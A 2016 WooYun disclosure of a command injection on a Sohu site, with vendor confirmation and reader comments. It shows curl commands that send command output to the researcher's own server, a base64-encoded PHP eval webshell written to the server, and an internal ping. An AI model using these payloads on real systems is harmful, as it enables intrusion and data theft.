破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

搜狐某站点隐式命令注入Getshell

编号191558
Urlhttp://www.wooyun.org/bug.php?action=view&id=191558
漏洞状态厂商已经确认
漏洞标题搜狐某站点隐式命令注入Getshell
漏洞类型命令执行
厂商搜狐
白帽子lijiejie
提交日期2016-04-01 22:17:00
公开日期2016-05-17 00:20:00
修复时间(not set)
确认时间2016-04-02 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank14
厂商评级
厂商评rank20
漏洞简介
搜狐某站点隐式命令注入getshell,本篇介绍利用HTTP request回显命令的基本方法
漏洞细节

命令注入点:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?hostname=`hostname`)


参数r可以注入Linux命令。上述链接是我将hostname通过curl打回web server。

sohu.brce.png


可以看到,pwd = /var/www/ldd/d

POC

在我的VPS上启动一个web server:

python -m SimpleHTTPServer 52016


然后在漏洞站点上执行:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?command=`command`)


使用curl把命令执行结果打回www.lijiejie.com:52016,印象中早期URL的长度限制是4096,差不多够我们用了。不过要注意的是,一些特殊字符必须编码之后才可以出现在参数中,比如换行\n,空格符这类。所以必须编码之后再附加到参数中。我们使用base64来编码。然而base64编码之后是有换行的,所以,我们还必须把base64命令输出的编码结果中的\n替换掉,我这里使用自己常用的“^”符号。执行一个命令的链接是:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?ls_command=`ls /var/www/ldd -l|base64|tr '\n' '^'`)


以上我们执行了ls /var/www/ldd -l,并把执行结果打回来,web server收到:

220.181.19.102 - - [01/Apr/2016 21:29:48] "GET /?ls_command=dG90YWwgNDA0Ci1ydy1yLS1yLS0gMSByb290IGFwYWNoZSAgIDIwMDIgTm92ICA1ICAyMDA5IF9s^ZGRhZG1pbi5waHAKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgIDE3NSBOb3YgIDUgIDIwMDkg^YXV0aGNoZWNrLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUgICAyNDYwIE5vdiAgNSAgMjAw^OSBhdXRoY29kZS5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNDI4NCBOb3YgMTEgMTY6^MDAgY29kZS5nYmsucGhwCi1ydy1yLS1yLS0gMSByb290IHJvb3QgICAgMTA3MDIgRmViIDEzICAy^MDE0IGNvZGUuaHRtbAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1ODkyIEZlYiAyOSAxODoz^MiBjb2RlLnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1MDQwIEZlYiAyOSAxMjo0NSBj^b2RlX2Jhay5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNTMwNyBGZWIgMjkgMTc6Mzcg^Y29kZV9uZXcucGhwCmRyd3hyLXhyLXggMyByb290IHJvb3QgICAgIDQwOTYgTWFyIDMwIDE1OjA2^IGQKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgMTE5MyBEZWMgMjMgIDIwMTAgaGVscHNvaHUu^YmF0CmRyd3hyLXhyLXggMiByb290IHJvb3QgICAgIDQwOTYgTm92IDEzIDE0OjAzIGltYWdlcwps^cnd4cnd4cnd4IDEgcm9vdCByb290ICAgICAgICA4IEZlYiAyNCAgMjAxNCBpbmRleC5waHAgLT4g^Y29kZS5waHAKZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCAgICAgNDA5NiBOb3YgMTMgMTM6NDcganMK^LXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAxNDQ2NyBOb3YgIDUgIDIwMDkgay5waHAKLXJ3LXIt^LXItLSAxIHJvb3QgYXBhY2hlICAxNDkyMiBGZWIgMjEgIDIwMTQgbGRkLnBocAotcnctci0tci0t^IDEgcm9vdCBhcGFjaGUgMjM5ODE0IE5vdiAgNSAgMjAwOSBuby5qcGcKLXJ3LXItLXItLSAxIHJv^b3Qgcm9vdCAgICAgICAgMCBOb3YgMTEgMTI6NDEgbnVsbC5qcGcKLXJ3LXItLXItLSAxIHJvb3Qg^YXBhY2hlICAgICA3MSBOb3YgIDUgIDIwMDkgc3BlZWQucGhwCi1ydy1yLS1yLS0gMSByb290IGFw^YWNoZSAgICAgIDAgTm92ICA1ICAyMDA5IHNwZWVkLnR4dAotcnctci0tci0tIDEgcm9vdCByb290^ICAgICAyNDYwIEZlYiAyNiAgMjAxNCBzdHlsZS5jc3MKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hl^ICAgIDIzNCBOb3YgIDUgIDIwMDkgdXBsb2FkLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUg^IDEzNjIyIE5vdiAgNSAgMjAwOSB6cHkucGhwCg==^ HTTP/1.1" 301 -


将参数ls_command base64decode之后,得到:

total 404
-rw-r--r-- 1 root apache 2002 Nov 5 2009 _lddadmin.php
-rw-r--r-- 1 root apache 175 Nov 5 2009 authcheck.php
-rw-r--r-- 1 root apache 2460 Nov 5 2009 authcode.php
-rw-r--r-- 1 root root 14284 Nov 11 16:00 code.gbk.php
-rw-r--r-- 1 root root 10702 Feb 13 2014 code.html
-rw-r--r-- 1 root root 15892 Feb 29 18:32 code.php
-rw-r--r-- 1 root root 15040 Feb 29 12:45 code_bak.php
-rw-r--r-- 1 root root 15307 Feb 29 17:37 code_new.php
drwxr-xr-x 3 root root 4096 Mar 30 15:06 d
-rw-r--r-- 1 root apache 1193 Dec 23 2010 helpsohu.bat
drwxr-xr-x 2 root root 4096 Nov 13 14:03 images
lrwxrwxrwx 1 root root 8 Feb 24 2014 index.php -> code.php
drwxr-xr-x 2 root root 4096 Nov 13 13:47 js
-rw-r--r-- 1 root apache 14467 Nov 5 2009 k.php
-rw-r--r-- 1 root apache 14922 Feb 21 2014 ldd.php
-rw-r--r-- 1 root apache 239814 Nov 5 2009 no.jpg
-rw-r--r-- 1 root root 0 Nov 11 12:41 null.jpg
-rw-r--r-- 1 root apache 71 Nov 5 2009 speed.php
-rw-r--r-- 1 root apache 0 Nov 5 2009 speed.txt
-rw-r--r-- 1 root root 2460 Feb 26 2014 style.css
-rw-r--r-- 1 root apache 234 Nov 5 2009 upload.php
-rw-r--r-- 1 root apache 13622 Nov 5 2009 zpy.php


我找到了一个可写的目录:

drwxrwxrwx 2 root root 4096 Nov 13 15:25 log


写了个webshell:

http://ldd.sohu.com/d/?c=c&r=$(echo "PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+Cgo=" |base64 -d >/var/www/ldd/d/log/x.php)


sohu.webshell.png


可以访问oa.sohu-inc.com:

[/var/www/]$ ping -c1 10.2.176.87
PING 10.2.176.87 (10.2.176.87) 56(84) bytes of data.
64 bytes from 10.2.176.87: icmp_seq=1 ttl=124 time=1.49 ms
--- 10.2.176.87 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.497/1.497/1.497/0.000 ms

修复方案

过滤

状态信息 2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-02: 厂商已经确认,细节仅向厂商公开
2016-04-12: 细节向核心白帽子及相关领域专家公开
2016-04-22: 细节向普通白帽子公开
2016-05-02: 细节向实习白帽子公开
2016-05-17: 细节向公众公开
厂商回复感谢支持。
回应信息危害等级:高漏洞Rank:20 确认时间:2016-04-02 00:11
Showing 1-8 of 8 items.
评论内容评论人点赞数评论时间

厉害

田老板02016-04-02 17:02:00

@xsser 这个看起来像是利用cloudeye发现的,哈哈~ 是吧

lijiejie02016-04-02 15:40:00

李姐姐真是吊吊吊

开心一下131302016-04-02 13:07:00

怎么发现的啊

xsser02016-04-02 09:55:00

隐式命令注入是啥意思呢

坏男孩-A_A02016-04-02 09:49:00

牛掰

sysALong02016-04-02 06:35:00

李姐姐开启了刷洞模式。。。。。可怕。

雅柏菲卡02016-04-01 22:40:00

开挂模式 哔哔 启动

玄道02016-04-01 22:24:00